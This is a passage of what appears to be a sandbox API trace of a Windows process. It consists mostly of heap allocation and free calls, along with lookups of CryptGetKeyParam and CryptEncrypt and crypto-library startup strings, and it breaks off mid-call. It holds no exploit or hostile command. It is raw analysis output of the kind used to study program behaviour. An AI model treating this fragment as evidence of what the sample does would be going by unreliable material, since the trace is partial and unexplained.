(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0083.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0083.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0083.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0083.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0083.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0083.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0083.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0083.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0083.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0083.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0083.918] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0083.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0083.919] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e25e0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e25e0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0083.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0083.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.921] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0083.921] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0083.921] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0083.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0083.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.923] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0083.923] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.924] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0083.924] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0083.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0083.924] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0083.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0083.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0083.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0083.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0083.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0083.924] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, 